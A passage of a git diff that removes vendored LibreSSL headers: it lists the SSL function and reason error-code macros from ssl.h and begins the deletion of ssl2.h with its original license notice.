-#define SSL_F_SSL3_SETUP_WRITE_BUFFER			 291
-#define SSL_F_SSL3_WRITE_BYTES				 158
-#define SSL_F_SSL3_WRITE_PENDING			 159
-#define SSL_F_SSL_ADD_CLIENTHELLO_RENEGOTIATE_EXT	 298
-#define SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT		 277
-#define SSL_F_SSL_ADD_CLIENTHELLO_USE_SRTP_EXT		 307
-#define SSL_F_SSL_ADD_DIR_CERT_SUBJECTS_TO_STACK	 215
-#define SSL_F_SSL_ADD_FILE_CERT_SUBJECTS_TO_STACK	 216
-#define SSL_F_SSL_ADD_SERVERHELLO_RENEGOTIATE_EXT	 299
-#define SSL_F_SSL_ADD_SERVERHELLO_TLSEXT		 278
-#define SSL_F_SSL_ADD_SERVERHELLO_USE_SRTP_EXT		 308
-#define SSL_F_SSL_BAD_METHOD				 160
-#define SSL_F_SSL_BYTES_TO_CIPHER_LIST			 161
-#define SSL_F_SSL_CERT_DUP				 221
-#define SSL_F_SSL_CERT_INST				 222
-#define SSL_F_SSL_CERT_INSTANTIATE			 214
-#define SSL_F_SSL_CERT_NEW				 162
-#define SSL_F_SSL_CHECK_PRIVATE_KEY			 163
-#define SSL_F_SSL_CHECK_SERVERHELLO_TLSEXT		 280
-#define SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG		 279
-#define SSL_F_SSL_CIPHER_PROCESS_RULESTR		 230
-#define SSL_F_SSL_CIPHER_STRENGTH_SORT			 231
-#define SSL_F_SSL_CLEAR					 164
-#define SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD		 165
-#define SSL_F_SSL_CREATE_CIPHER_LIST			 166
-#define SSL_F_SSL_CTRL					 232
-#define SSL_F_SSL_CTX_CHECK_PRIVATE_KEY			 168
-#define SSL_F_SSL_CTX_MAKE_PROFILES			 309
-#define SSL_F_SSL_CTX_NEW				 169
-#define SSL_F_SSL_CTX_SET_CIPHER_LIST			 269
-#define SSL_F_SSL_CTX_SET_CLIENT_CERT_ENGINE		 290
-#define SSL_F_SSL_CTX_SET_PURPOSE			 226
-#define SSL_F_SSL_CTX_SET_SESSION_ID_CONTEXT		 219
-#define SSL_F_SSL_CTX_SET_SSL_VERSION			 170
-#define SSL_F_SSL_CTX_SET_TRUST				 229
-#define SSL_F_SSL_CTX_USE_CERTIFICATE			 171
-#define SSL_F_SSL_CTX_USE_CERTIFICATE_ASN1		 172
-#define SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE	 220
-#define SSL_F_SSL_CTX_USE_CERTIFICATE_FILE		 173
-#define SSL_F_SSL_CTX_USE_PRIVATEKEY			 174
-#define SSL_F_SSL_CTX_USE_PRIVATEKEY_ASN1		 175
-#define SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE		 176
-#define SSL_F_SSL_CTX_USE_PSK_IDENTITY_HINT		 272
-#define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY			 177
-#define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_ASN1		 178
-#define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE		 179
-#define SSL_F_SSL_DO_HANDSHAKE				 180
-#define SSL_F_SSL_GET_NEW_SESSION			 181
-#define SSL_F_SSL_GET_PREV_SESSION			 217
-#define SSL_F_SSL_GET_SERVER_SEND_CERT			 182
-#define SSL_F_SSL_GET_SERVER_SEND_PKEY			 317
-#define SSL_F_SSL_GET_SIGN_PKEY				 183
-#define SSL_F_SSL_INIT_WBIO_BUFFER			 184
-#define SSL_F_SSL_LOAD_CLIENT_CA_FILE			 185
-#define SSL_F_SSL_NEW					 186
-#define SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT	 300
-#define SSL_F_SSL_PARSE_CLIENTHELLO_TLSEXT		 302
-#define SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT	 310
-#define SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT	 301
-#define SSL_F_SSL_PARSE_SERVERHELLO_TLSEXT		 303
-#define SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT	 311
-#define SSL_F_SSL_PEEK					 270
-#define SSL_F_SSL_PREPARE_CLIENTHELLO_TLSEXT		 281
-#define SSL_F_SSL_PREPARE_SERVERHELLO_TLSEXT		 282
-#define SSL_F_SSL_READ					 223
-#define SSL_F_SSL_RSA_PRIVATE_DECRYPT			 187
-#define SSL_F_SSL_RSA_PUBLIC_ENCRYPT			 188
-#define SSL_F_SSL_SESSION_NEW				 189
-#define SSL_F_SSL_SESSION_PRINT_FP			 190
-#define SSL_F_SSL_SESSION_SET1_ID_CONTEXT		 312
-#define SSL_F_SSL_SESS_CERT_NEW				 225
-#define SSL_F_SSL_SET_CERT				 191
-#define SSL_F_SSL_SET_CIPHER_LIST			 271
-#define SSL_F_SSL_SET_FD				 192
-#define SSL_F_SSL_SET_PKEY				 193
-#define SSL_F_SSL_SET_PURPOSE				 227
-#define SSL_F_SSL_SET_RFD				 194
-#define SSL_F_SSL_SET_SESSION				 195
-#define SSL_F_SSL_SET_SESSION_ID_CONTEXT		 218
-#define SSL_F_SSL_SET_SESSION_TICKET_EXT		 294
-#define SSL_F_SSL_SET_TRUST				 228
-#define SSL_F_SSL_SET_WFD				 196
-#define SSL_F_SSL_SHUTDOWN				 224
-#define SSL_F_SSL_SRP_CTX_INIT				 313
-#define SSL_F_SSL_UNDEFINED_CONST_FUNCTION		 243
-#define SSL_F_SSL_UNDEFINED_FUNCTION			 197
-#define SSL_F_SSL_UNDEFINED_VOID_FUNCTION		 244
-#define SSL_F_SSL_USE_CERTIFICATE			 198
-#define SSL_F_SSL_USE_CERTIFICATE_ASN1			 199
-#define SSL_F_SSL_USE_CERTIFICATE_FILE			 200
-#define SSL_F_SSL_USE_PRIVATEKEY			 201
-#define SSL_F_SSL_USE_PRIVATEKEY_ASN1			 202
-#define SSL_F_SSL_USE_PRIVATEKEY_FILE			 203
-#define SSL_F_SSL_USE_PSK_IDENTITY_HINT			 273
-#define SSL_F_SSL_USE_RSAPRIVATEKEY			 204
-#define SSL_F_SSL_USE_RSAPRIVATEKEY_ASN1		 205
-#define SSL_F_SSL_USE_RSAPRIVATEKEY_FILE		 206
-#define SSL_F_SSL_VERIFY_CERT_CHAIN			 207
-#define SSL_F_SSL_WRITE					 208
-#define SSL_F_TLS1_AEAD_CTX_INIT			 339
-#define SSL_F_TLS1_CERT_VERIFY_MAC			 286
-#define SSL_F_TLS1_CHANGE_CIPHER_STATE			 209
-#define SSL_F_TLS1_CHANGE_CIPHER_STATE_AEAD		 340
-#define SSL_F_TLS1_CHANGE_CIPHER_STATE_CIPHER		 338
-#define SSL_F_TLS1_CHECK_SERVERHELLO_TLSEXT		 274
-#define SSL_F_TLS1_ENC					 210
-#define SSL_F_TLS1_EXPORT_KEYING_MATERIAL		 314
-#define SSL_F_TLS1_HEARTBEAT				 315
-#define SSL_F_TLS1_PREPARE_CLIENTHELLO_TLSEXT		 275
-#define SSL_F_TLS1_PREPARE_SERVERHELLO_TLSEXT		 276
-#define SSL_F_TLS1_PRF					 284
-#define SSL_F_TLS1_SETUP_KEY_BLOCK			 211
-#define SSL_F_WRITE_PENDING				 212
-
-/* Reason codes. */
-#define SSL_R_APP_DATA_IN_HANDSHAKE			 100
-#define SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT 272
-#define SSL_R_BAD_ALERT_RECORD				 101
-#define SSL_R_BAD_AUTHENTICATION_TYPE			 102
-#define SSL_R_BAD_CHANGE_CIPHER_SPEC			 103
-#define SSL_R_BAD_CHECKSUM				 104
-#define SSL_R_BAD_DATA_RETURNED_BY_CALLBACK		 106
-#define SSL_R_BAD_DECOMPRESSION				 107
-#define SSL_R_BAD_DH_G_LENGTH				 108
-#define SSL_R_BAD_DH_PUB_KEY_LENGTH			 109
-#define SSL_R_BAD_DH_P_LENGTH				 110
-#define SSL_R_BAD_DIGEST_LENGTH				 111
-#define SSL_R_BAD_DSA_SIGNATURE				 112
-#define SSL_R_BAD_ECC_CERT				 304
-#define SSL_R_BAD_ECDSA_SIGNATURE			 305
-#define SSL_R_BAD_ECPOINT				 306
-#define SSL_R_BAD_HANDSHAKE_LENGTH			 332
-#define SSL_R_BAD_HELLO_REQUEST				 105
-#define SSL_R_BAD_LENGTH				 271
-#define SSL_R_BAD_MAC_DECODE				 113
-#define SSL_R_BAD_MAC_LENGTH				 333
-#define SSL_R_BAD_MESSAGE_TYPE				 114
-#define SSL_R_BAD_PACKET_LENGTH				 115
-#define SSL_R_BAD_PROTOCOL_VERSION_NUMBER		 116
-#define SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH		 316
-#define SSL_R_BAD_RESPONSE_ARGUMENT			 117
-#define SSL_R_BAD_RSA_DECRYPT				 118
-#define SSL_R_BAD_RSA_ENCRYPT				 119
-#define SSL_R_BAD_RSA_E_LENGTH				 120
-#define SSL_R_BAD_RSA_MODULUS_LENGTH			 121
-#define SSL_R_BAD_RSA_SIGNATURE				 122
-#define SSL_R_BAD_SIGNATURE				 123
-#define SSL_R_BAD_SRP_A_LENGTH				 347
-#define SSL_R_BAD_SRP_B_LENGTH				 348
-#define SSL_R_BAD_SRP_G_LENGTH				 349
-#define SSL_R_BAD_SRP_N_LENGTH				 350
-#define SSL_R_BAD_SRP_S_LENGTH				 351
-#define SSL_R_BAD_SRTP_MKI_VALUE			 352
-#define SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST		 353
-#define SSL_R_BAD_SSL_FILETYPE				 124
-#define SSL_R_BAD_SSL_SESSION_ID_LENGTH			 125
-#define SSL_R_BAD_STATE					 126
-#define SSL_R_BAD_WRITE_RETRY				 127
-#define SSL_R_BIO_NOT_SET				 128
-#define SSL_R_BLOCK_CIPHER_PAD_IS_WRONG			 129
-#define SSL_R_BN_LIB					 130
-#define SSL_R_CA_DN_LENGTH_MISMATCH			 131
-#define SSL_R_CA_DN_TOO_LONG				 132
-#define SSL_R_CCS_RECEIVED_EARLY			 133
-#define SSL_R_CERTIFICATE_VERIFY_FAILED			 134
-#define SSL_R_CERT_LENGTH_MISMATCH			 135
-#define SSL_R_CHALLENGE_IS_DIFFERENT			 136
-#define SSL_R_CIPHER_CODE_WRONG_LENGTH			 137
-#define SSL_R_CIPHER_COMPRESSION_UNAVAILABLE		 371
-#define SSL_R_CIPHER_OR_HASH_UNAVAILABLE		 138
-#define SSL_R_CIPHER_TABLE_SRC_ERROR			 139
-#define SSL_R_CLIENTHELLO_TLSEXT			 226
-#define SSL_R_COMPRESSED_LENGTH_TOO_LONG		 140
-#define SSL_R_COMPRESSION_DISABLED			 343
-#define SSL_R_COMPRESSION_FAILURE			 141
-#define SSL_R_COMPRESSION_ID_NOT_WITHIN_PRIVATE_RANGE	 307
-#define SSL_R_COMPRESSION_LIBRARY_ERROR			 142
-#define SSL_R_CONNECTION_ID_IS_DIFFERENT		 143
-#define SSL_R_CONNECTION_TYPE_NOT_SET			 144
-#define SSL_R_COOKIE_MISMATCH				 308
-#define SSL_R_DATA_BETWEEN_CCS_AND_FINISHED		 145
-#define SSL_R_DATA_LENGTH_TOO_LONG			 146
-#define SSL_R_DECRYPTION_FAILED				 147
-#define SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC	 281
-#define SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG		 148
-#define SSL_R_DIGEST_CHECK_FAILED			 149
-#define SSL_R_DTLS_MESSAGE_TOO_BIG			 334
-#define SSL_R_DUPLICATE_COMPRESSION_ID			 309
-#define SSL_R_ECC_CERT_NOT_FOR_KEY_AGREEMENT		 317
-#define SSL_R_ECC_CERT_NOT_FOR_SIGNING			 318
-#define SSL_R_ECC_CERT_SHOULD_HAVE_RSA_SIGNATURE	 322
-#define SSL_R_ECC_CERT_SHOULD_HAVE_SHA1_SIGNATURE	 323
-#define SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER		 310
-#define SSL_R_EMPTY_SRTP_PROTECTION_PROFILE_LIST	 354
-#define SSL_R_ENCRYPTED_LENGTH_TOO_LONG			 150
-#define SSL_R_ERROR_GENERATING_TMP_RSA_KEY		 282
-#define SSL_R_ERROR_IN_RECEIVED_CIPHER_LIST		 151
-#define SSL_R_EXCESSIVE_MESSAGE_SIZE			 152
-#define SSL_R_EXTRA_DATA_IN_MESSAGE			 153
-#define SSL_R_GOT_A_FIN_BEFORE_A_CCS			 154
-#define SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS		 355
-#define SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION		 356
-#define SSL_R_HTTPS_PROXY_REQUEST			 155
-#define SSL_R_HTTP_REQUEST				 156
-#define SSL_R_ILLEGAL_PADDING				 283
-#define SSL_R_INAPPROPRIATE_FALLBACK			 373
-#define SSL_R_INCONSISTENT_COMPRESSION			 340
-#define SSL_R_INVALID_CHALLENGE_LENGTH			 158
-#define SSL_R_INVALID_COMMAND				 280
-#define SSL_R_INVALID_COMPRESSION_ALGORITHM		 341
-#define SSL_R_INVALID_PURPOSE				 278
-#define SSL_R_INVALID_SRP_USERNAME			 357
-#define SSL_R_INVALID_STATUS_RESPONSE			 328
-#define SSL_R_INVALID_TICKET_KEYS_LENGTH		 325
-#define SSL_R_INVALID_TRUST				 279
-#define SSL_R_KEY_ARG_TOO_LONG				 284
-#define SSL_R_KRB5					 285
-#define SSL_R_KRB5_C_CC_PRINC				 286
-#define SSL_R_KRB5_C_GET_CRED				 287
-#define SSL_R_KRB5_C_INIT				 288
-#define SSL_R_KRB5_C_MK_REQ				 289
-#define SSL_R_KRB5_S_BAD_TICKET				 290
-#define SSL_R_KRB5_S_INIT				 291
-#define SSL_R_KRB5_S_RD_REQ				 292
-#define SSL_R_KRB5_S_TKT_EXPIRED			 293
-#define SSL_R_KRB5_S_TKT_NYV				 294
-#define SSL_R_KRB5_S_TKT_SKEW				 295
-#define SSL_R_LENGTH_MISMATCH				 159
-#define SSL_R_LENGTH_TOO_SHORT				 160
-#define SSL_R_LIBRARY_BUG				 274
-#define SSL_R_LIBRARY_HAS_NO_CIPHERS			 161
-#define SSL_R_MESSAGE_TOO_LONG				 296
-#define SSL_R_MISSING_DH_DSA_CERT			 162
-#define SSL_R_MISSING_DH_KEY				 163
-#define SSL_R_MISSING_DH_RSA_CERT			 164
-#define SSL_R_MISSING_DSA_SIGNING_CERT			 165
-#define SSL_R_MISSING_EXPORT_TMP_DH_KEY			 166
-#define SSL_R_MISSING_EXPORT_TMP_RSA_KEY		 167
-#define SSL_R_MISSING_RSA_CERTIFICATE			 168
-#define SSL_R_MISSING_RSA_ENCRYPTING_CERT		 169
-#define SSL_R_MISSING_RSA_SIGNING_CERT			 170
-#define SSL_R_MISSING_SRP_PARAM				 358
-#define SSL_R_MISSING_TMP_DH_KEY			 171
-#define SSL_R_MISSING_TMP_ECDH_KEY			 311
-#define SSL_R_MISSING_TMP_RSA_KEY			 172
-#define SSL_R_MISSING_TMP_RSA_PKEY			 173
-#define SSL_R_MISSING_VERIFY_MESSAGE			 174
-#define SSL_R_MULTIPLE_SGC_RESTARTS			 346
-#define SSL_R_NON_SSLV2_INITIAL_PACKET			 175
-#define SSL_R_NO_CERTIFICATES_RETURNED			 176
-#define SSL_R_NO_CERTIFICATE_ASSIGNED			 177
-#define SSL_R_NO_CERTIFICATE_RETURNED			 178
-#define SSL_R_NO_CERTIFICATE_SET			 179
-#define SSL_R_NO_CERTIFICATE_SPECIFIED			 180
-#define SSL_R_NO_CIPHERS_AVAILABLE			 181
-#define SSL_R_NO_CIPHERS_PASSED				 182
-#define SSL_R_NO_CIPHERS_SPECIFIED			 183
-#define SSL_R_NO_CIPHER_LIST				 184
-#define SSL_R_NO_CIPHER_MATCH				 185
-#define SSL_R_NO_CLIENT_CERT_METHOD			 331
-#define SSL_R_NO_CLIENT_CERT_RECEIVED			 186
-#define SSL_R_NO_COMPRESSION_SPECIFIED			 187
-#define SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER		 330
-#define SSL_R_NO_METHOD_SPECIFIED			 188
-#define SSL_R_NO_PRIVATEKEY				 189
-#define SSL_R_NO_PRIVATE_KEY_ASSIGNED			 190
-#define SSL_R_NO_PROTOCOLS_AVAILABLE			 191
-#define SSL_R_NO_PUBLICKEY				 192
-#define SSL_R_NO_RENEGOTIATION				 339
-#define SSL_R_NO_REQUIRED_DIGEST			 324
-#define SSL_R_NO_SHARED_CIPHER				 193
-#define SSL_R_NO_SRTP_PROFILES				 359
-#define SSL_R_NO_VERIFY_CALLBACK			 194
-#define SSL_R_NULL_SSL_CTX				 195
-#define SSL_R_NULL_SSL_METHOD_PASSED			 196
-#define SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED		 197
-#define SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED 344
-#define SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE		 297
-#define SSL_R_PACKET_LENGTH_TOO_LONG			 198
-#define SSL_R_PARSE_TLSEXT				 227
-#define SSL_R_PATH_TOO_LONG				 270
-#define SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE		 199
-#define SSL_R_PEER_ERROR				 200
-#define SSL_R_PEER_ERROR_CERTIFICATE			 201
-#define SSL_R_PEER_ERROR_NO_CERTIFICATE			 202
-#define SSL_R_PEER_ERROR_NO_CIPHER			 203
-#define SSL_R_PEER_ERROR_UNSUPPORTED_CERTIFICATE_TYPE	 204
-#define SSL_R_PRE_MAC_LENGTH_TOO_LONG			 205
-#define SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS		 206
-#define SSL_R_PROTOCOL_IS_SHUTDOWN			 207
-#define SSL_R_PSK_IDENTITY_NOT_FOUND			 223
-#define SSL_R_PSK_NO_CLIENT_CB				 224
-#define SSL_R_PSK_NO_SERVER_CB				 225
-#define SSL_R_PUBLIC_KEY_ENCRYPT_ERROR			 208
-#define SSL_R_PUBLIC_KEY_IS_NOT_RSA			 209
-#define SSL_R_PUBLIC_KEY_NOT_RSA			 210
-#define SSL_R_READ_BIO_NOT_SET				 211
-#define SSL_R_READ_TIMEOUT_EXPIRED			 312
-#define SSL_R_READ_WRONG_PACKET_TYPE			 212
-#define SSL_R_RECORD_LENGTH_MISMATCH			 213
-#define SSL_R_RECORD_TOO_LARGE				 214
-#define SSL_R_RECORD_TOO_SMALL				 298
-#define SSL_R_RENEGOTIATE_EXT_TOO_LONG			 335
-#define SSL_R_RENEGOTIATION_ENCODING_ERR		 336
-#define SSL_R_RENEGOTIATION_MISMATCH			 337
-#define SSL_R_REQUIRED_CIPHER_MISSING			 215
-#define SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING	 342
-#define SSL_R_REUSE_CERT_LENGTH_NOT_ZERO		 216
-#define SSL_R_REUSE_CERT_TYPE_NOT_ZERO			 217
-#define SSL_R_REUSE_CIPHER_LIST_NOT_ZERO		 218
-#define SSL_R_SCSV_RECEIVED_WHEN_RENEGOTIATING		 345
-#define SSL_R_SERVERHELLO_TLSEXT			 275
-#define SSL_R_SESSION_ID_CONTEXT_UNINITIALIZED		 277
-#define SSL_R_SHORT_READ				 219
-#define SSL_R_SIGNATURE_ALGORITHMS_ERROR		 360
-#define SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE	 220
-#define SSL_R_SRP_A_CALC				 361
-#define SSL_R_SRTP_COULD_NOT_ALLOCATE_PROFILES		 362
-#define SSL_R_SRTP_PROTECTION_PROFILE_LIST_TOO_LONG	 363
-#define SSL_R_SRTP_UNKNOWN_PROTECTION_PROFILE		 364
-#define SSL_R_SSL23_DOING_SESSION_ID_REUSE		 221
-#define SSL_R_SSL2_CONNECTION_ID_TOO_LONG		 299
-#define SSL_R_SSL3_EXT_INVALID_ECPOINTFORMAT		 321
-#define SSL_R_SSL3_EXT_INVALID_SERVERNAME		 319
-#define SSL_R_SSL3_EXT_INVALID_SERVERNAME_TYPE		 320
-#define SSL_R_SSL3_SESSION_ID_TOO_LONG			 300
-#define SSL_R_SSL3_SESSION_ID_TOO_SHORT			 222
-#define SSL_R_SSLV3_ALERT_BAD_CERTIFICATE		 1042
-#define SSL_R_SSLV3_ALERT_BAD_RECORD_MAC		 1020
-#define SSL_R_SSLV3_ALERT_CERTIFICATE_EXPIRED		 1045
-#define SSL_R_SSLV3_ALERT_CERTIFICATE_REVOKED		 1044
-#define SSL_R_SSLV3_ALERT_CERTIFICATE_UNKNOWN		 1046
-#define SSL_R_SSLV3_ALERT_DECOMPRESSION_FAILURE		 1030
-#define SSL_R_SSLV3_ALERT_HANDSHAKE_FAILURE		 1040
-#define SSL_R_SSLV3_ALERT_ILLEGAL_PARAMETER		 1047
-#define SSL_R_SSLV3_ALERT_NO_CERTIFICATE		 1041
-#define SSL_R_SSLV3_ALERT_UNEXPECTED_MESSAGE		 1010
-#define SSL_R_SSLV3_ALERT_UNSUPPORTED_CERTIFICATE	 1043
-#define SSL_R_SSL_CTX_HAS_NO_DEFAULT_SSL_VERSION	 228
-#define SSL_R_SSL_HANDSHAKE_FAILURE			 229
-#define SSL_R_SSL_LIBRARY_HAS_NO_CIPHERS		 230
-#define SSL_R_SSL_SESSION_ID_CALLBACK_FAILED		 301
-#define SSL_R_SSL_SESSION_ID_CONFLICT			 302
-#define SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG		 273
-#define SSL_R_SSL_SESSION_ID_HAS_BAD_LENGTH		 303
-#define SSL_R_SSL_SESSION_ID_IS_DIFFERENT		 231
-#define SSL_R_TLSV1_ALERT_ACCESS_DENIED			 1049
-#define SSL_R_TLSV1_ALERT_DECODE_ERROR			 1050
-#define SSL_R_TLSV1_ALERT_DECRYPTION_FAILED		 1021
-#define SSL_R_TLSV1_ALERT_DECRYPT_ERROR			 1051
-#define SSL_R_TLSV1_ALERT_EXPORT_RESTRICTION		 1060
-#define SSL_R_TLSV1_ALERT_INAPPROPRIATE_FALLBACK	 1086
-#define SSL_R_TLSV1_ALERT_INSUFFICIENT_SECURITY		 1071
-#define SSL_R_TLSV1_ALERT_INTERNAL_ERROR		 1080
-#define SSL_R_TLSV1_ALERT_NO_RENEGOTIATION		 1100
-#define SSL_R_TLSV1_ALERT_PROTOCOL_VERSION		 1070
-#define SSL_R_TLSV1_ALERT_RECORD_OVERFLOW		 1022
-#define SSL_R_TLSV1_ALERT_UNKNOWN_CA			 1048
-#define SSL_R_TLSV1_ALERT_USER_CANCELLED		 1090
-#define SSL_R_TLSV1_BAD_CERTIFICATE_HASH_VALUE		 1114
-#define SSL_R_TLSV1_BAD_CERTIFICATE_STATUS_RESPONSE	 1113
-#define SSL_R_TLSV1_CERTIFICATE_UNOBTAINABLE		 1111
-#define SSL_R_TLSV1_UNRECOGNIZED_NAME			 1112
-#define SSL_R_TLSV1_UNSUPPORTED_EXTENSION		 1110
-#define SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER	 232
-#define SSL_R_TLS_HEARTBEAT_PEER_DOESNT_ACCEPT		 365
-#define SSL_R_TLS_HEARTBEAT_PENDING			 366
-#define SSL_R_TLS_ILLEGAL_EXPORTER_LABEL		 367
-#define SSL_R_TLS_INVALID_ECPOINTFORMAT_LIST		 157
-#define SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST 233
-#define SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG	 234
-#define SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER		 235
-#define SSL_R_UNABLE_TO_DECODE_DH_CERTS			 236
-#define SSL_R_UNABLE_TO_DECODE_ECDH_CERTS		 313
-#define SSL_R_UNABLE_TO_EXTRACT_PUBLIC_KEY		 237
-#define SSL_R_UNABLE_TO_FIND_DH_PARAMETERS		 238
-#define SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS		 314
-#define SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS	 239
-#define SSL_R_UNABLE_TO_FIND_SSL_METHOD			 240
-#define SSL_R_UNABLE_TO_LOAD_SSL2_MD5_ROUTINES		 241
-#define SSL_R_UNABLE_TO_LOAD_SSL3_MD5_ROUTINES		 242
-#define SSL_R_UNABLE_TO_LOAD_SSL3_SHA1_ROUTINES		 243
-#define SSL_R_UNEXPECTED_MESSAGE			 244
-#define SSL_R_UNEXPECTED_RECORD				 245
-#define SSL_R_UNINITIALIZED				 276
-#define SSL_R_UNKNOWN_ALERT_TYPE			 246
-#define SSL_R_UNKNOWN_CERTIFICATE_TYPE			 247
-#define SSL_R_UNKNOWN_CIPHER_RETURNED			 248
-#define SSL_R_UNKNOWN_CIPHER_TYPE			 249
-#define SSL_R_UNKNOWN_DIGEST				 368
-#define SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE			 250
-#define SSL_R_UNKNOWN_PKEY_TYPE				 251
-#define SSL_R_UNKNOWN_PROTOCOL				 252
-#define SSL_R_UNKNOWN_REMOTE_ERROR_TYPE			 253
-#define SSL_R_UNKNOWN_SSL_VERSION			 254
-#define SSL_R_UNKNOWN_STATE				 255
-#define SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED	 338
-#define SSL_R_UNSUPPORTED_CIPHER			 256
-#define SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM		 257
-#define SSL_R_UNSUPPORTED_DIGEST_TYPE			 326
-#define SSL_R_UNSUPPORTED_ELLIPTIC_CURVE		 315
-#define SSL_R_UNSUPPORTED_PROTOCOL			 258
-#define SSL_R_UNSUPPORTED_SSL_VERSION			 259
-#define SSL_R_UNSUPPORTED_STATUS_TYPE			 329
-#define SSL_R_USE_SRTP_NOT_NEGOTIATED			 369
-#define SSL_R_WRITE_BIO_NOT_SET				 260
-#define SSL_R_WRONG_CIPHER_RETURNED			 261
-#define SSL_R_WRONG_CURVE				 378
-#define SSL_R_WRONG_MESSAGE_TYPE			 262
-#define SSL_R_WRONG_NUMBER_OF_KEY_BITS			 263
-#define SSL_R_WRONG_SIGNATURE_LENGTH			 264
-#define SSL_R_WRONG_SIGNATURE_SIZE			 265
-#define SSL_R_WRONG_SIGNATURE_TYPE			 370
-#define SSL_R_WRONG_SSL_VERSION				 266
-#define SSL_R_WRONG_VERSION_NUMBER			 267
-#define SSL_R_X509_LIB					 268
-#define SSL_R_X509_VERIFICATION_SETUP_PROBLEMS		 269
-#define SSL_R_PEER_BEHAVING_BADLY			 666
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl2.h b/thirdparty/libressl/include/openssl/ssl2.h
deleted file mode 100644
index 3a8d300..0000000
--- a/thirdparty/libressl/include/openssl/ssl2.h
+++ /dev/null
@@ -1,153 +0,0 @@
-/* $OpenBSD: ssl2.h,v 1.12 2014/12/14 15:30:50 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_SSL2_H
-#define HEADER_SSL2_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Protocol Version Codes */
